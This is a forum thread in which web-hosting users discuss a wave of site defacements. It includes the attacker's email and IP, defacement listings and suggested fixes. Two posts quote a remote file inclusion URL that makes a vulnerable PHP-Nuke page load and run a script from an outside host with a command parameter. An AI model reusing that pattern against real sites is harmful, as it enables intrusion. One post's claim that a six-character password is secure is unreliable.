FRIHOST FORUMS SEARCH FAQ TOS BLOGS COMPETITIONS
You are invited to Log in or Register a free Frihost Account!


My website has been hacked





andy26
hi my frihost account was hacked by this person kol3r@hotmail.de


their ip is: 88.251.218.98

is there anything you can do about this hes taken over my whole site i added him on msn but he didnt say much apart from frih host has no security so i dont think its just my site in danger i think this person is trying to take down frih host

Edit: i spoke to the person that hacked me and they unhacked me. but could the admin of this site please do something with my accounts security
ncwdavid
I don't know much about frihosts security but I think its mainly up to you to secure your site. Make sure your password for DirectAdmin is very secure and all your FTP passwords are secure and your database passwords.

If your site is driven by PHP and MySql then its really up to you how secure it is. Make sure you never trust anything that a user inputs into an input field or an url they enter.
andy26
he said he got in via ftp and said no security but all my ftps have passwords
Sunny
and what makes you feel like your account has been hacked? you can't login to Direct Admin or your site is giving errors or just because he told you so?

If you can't login to direct admin, try to reset your password using this link and see if it works.
andy26
the site is back now and 1st of all i noticed because they hacked my forum by editing my page and left details so i added them on msn and asked for it back then they took over the full thing i beleive they used this tool http://karamanlilar.org/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=http://www.awaywiththefairies.us/a?cmd=id

also if you type the persons email in google you can see other sites they have hacked the persons email is at the top of this thread

suppose all i can do now is change every password i have and block the ip that this person used to gain access my site and i know its the persons ip because i have a stat tracker and i found it was turkish which if you put the guys email in google you can see that there based in turkey. so i will have to put a accsess block on this ip
Sunny
You got it back using that password retrieval link?


Apart from changing passwords also make sure that you have given right permission for folder and files (CHMOD)
andy26
nope i just simply asked them so many times they gave me controll back. iv done a bit of resarch and found they could of got through my forum at least i think so. i just hope it doesnt happen again i was worrying like crazy i have a really bad headach now.

what do you suppose my chmod permision should be for my forum index its currently set to 777?
cybernie
My site has been hacked to... can't open my forum which is my main page.

list of hacked site can be found at http://www.zone-h.org/component/option,com_attacks/Itemid,43/filter_defacer,Sonvurus.oRg

using the filter by domain, many frihosters are affected by this attack.
FunDa
Waaaa ------ my site tooo


They put

hacked by KOL3R@=ilknur SONVURUS.ORG

in www.fundazone.com/freesms page

I checked out the page (it was a php page) and there were no modifications in that.
But there was a php code i used to track my web statistics - tracewatch

When I removed that code, it was fine ...


www.fundazone.com main page

Actually, in my site they attacked through my site statistics php tracker.

I "unhacked" it , but please, someone tell me how to close the loopholes !!!!

Confused

It seems a lot of frih.net sites were hacked !!!!
andy26
cant we all fill out a report of what these people did and send it to there isp to try and get them banned from the internet i have their ip thanx to my site stats tracker. we should do something to act agains these hackers. i think they got through our data base passwords so keep our ftp passwords differnt to our database passwords

they sent me this page which i think is a web tool they used to hack our sql passwords http://karamanlilar.org/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=http://www.awaywiththefairies.us/a?cmd=id

Edit: should we all team up and do something about this if so add me on my msn aswell. we must have enough proof to get these people taken down not like there just hacking to find out the workings of a computer system their destroying thousands of online business and your site to so we need to do something about it. we also need to work on loop holes in our sites and server settings.
silvermesh
just have to be more careful about the PHP scripts and mods you install on your site. if you got hacked there was probably a security problem with the forum script or whatever it was you were using. I would contact the makers of your forum scripts.
icedrakon
I can help about security if i start to get involed about it, for anyone who wants something for defence and not for attack becouse we might open a war then which is not neceserary at least at the time been...
Marston
Create a .htaccess file, and place the following in it.
Code:
RewriteEngine On
# Block http://karamanlilar.org
Deny from 216.32.85.170
FunDa
http://www.zone-h.org/index.php?option=com_attacks&Itemid=43&filter=1
Daniel15
Firstly, change your passwords! This is most important.

Quote:
they sent me this page which i think is a web tool they used to hack our sql passwords http://karamanlilar.org/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=http://www.awaywiththefairies.us/a?cmd=id

That's a security hole in PHP-Nuke. Upgrade your PHP-Nuke installation to the latest version immediately! If this is not possible, disable access to your website until it is fixed.
These hacks are not due to lack of security on FriHost, they're due to scripts with security holes in them. For anyone using PHP-Nuke, I'd suggest to remove it immediately!
icedrakon
This is the portal from where the turkish hackers came from sonvurus.org



Site sonvurus.org


Windows Server 2003 Microsoft-IIS/6.0 13-May-2007 67.19.6.4 ThePlanet.com Internet Services
Linux Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.6 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a 30-Apr-2007 88.255.164.220 Fevzicakmak Cad. No: 57 / 6 Osmangazi Bursa / TR
Linux Apache/2.0.46 (CentOS) 30-Mar-2007 91.151.84.20 Gigabitweb Dedicated Servers Network
Windows Server 2003 Microsoft-IIS/6.0 10-Mar-2007 74.52.114.250 ThePlanet.com Internet Services
Linux Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.5 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a 25-Feb-2007 62.68.202.82 Nixcon Networks Inc.
Linux Apache 17-Feb-2007 62.68.202.82 Nixcon Networks Inc.
Windows Server 2003 Microsoft-IIS/6.0 11-Feb-2007 62.68.199.66 Nixcon Networks Inc.

THE TEAM IS CALLED Hacked By MephisTo


Team: | Zorbey | Delpi | Axel | Kamashira | K!Ko | Albert | |Kol3r@|
andy26
Has there been any news on the process of this report you've made.
icedrakon
I cant find their site on the net i think the report was affective.....
I dont want to start a war i have better things to do with my time or i will attack when i am prepared to be invsible from counterattacks...

Try my site it has a link to a powerfull IDS... more in the fututre
andy26
i dont think attacking will be a very good thing especialy if it can cause wars. its best just to report them as much as we can to make sure they get caught for their hacking
andy26
my site has been safe for 2 weeks now since the hackers attacked is everyone else ok. if your fihhost website has been hacked please post it in here. also any news on the hackers?
FunDa
Mine looks ok ... But not sire if the hackers opened some backdoor anywhere ...

My site is www.fundazone.com and I think some files went missing , but probably it is server 2 's fault ...

Was only server 2 attacked ? Maybe it was one of those hackers' scripts that is slowing server 2 down ? Maybe they planted more scripts in the sites of innocent users ?


I used a backup to an older date, so I guess everyone on server 2 can do that to flush out the hacker's scripts if there are any ...


Or just go through all the files and kill off anything suspicious - check your htaccess, index.php and all the default error pages for malicious code ... Cool
krazy
yep make sure you use secure passwords... for example i use passwords like this... hgf543 it is quite secure and not many people can guess that.
and i change my password regularly
ans no that password i don't use for frihost... or anything... made it up on the spot!
froginabox
If you need a good way to create secure passwords (like the mumbo-jumbo letters and numbers ones for DirectAdmin), try this applet:

http://www.angel.net/~nic/passwd.html

It works well for me.
m-productions
andy26 wrote:
nope i just simply asked them so many times they gave me controll back. iv done a bit of resarch and found they could of got through my forum at least i think so. i just hope it doesnt happen again i was worrying like crazy i have a really bad headach now.

what do you suppose my chmod permision should be for my forum index its currently set to 777?


that would explain why he said no security in your FTP.. if you have it set to 777 ANYONE can write to them... I could even go and write something to your site if i wanted to know.. you should really try setting your folders to 755.
Related topics
Google Hacked?
How To : Secure Your PHP Website
Website: Unknown!
A Virgins Plea
No website is secure from this man
web site hacked, need help deleting files
Dzial ogloszen
Backups
Forums hacked
Website security.
My Joomla Site Hacked
SEGA website hacked
The internet is so UNsecure!
Is my Website hacked ? :O Urgent !!! Please Tell me !!!
Reply to topic    Frihost Forum Index -> Support and Web Hosting -> Frihost Support

FRIHOST HOME | FAQ | TOS | ABOUT US | CONTACT US | SITE MAP
© 2005-2011 Frihost, forums powered by phpBB.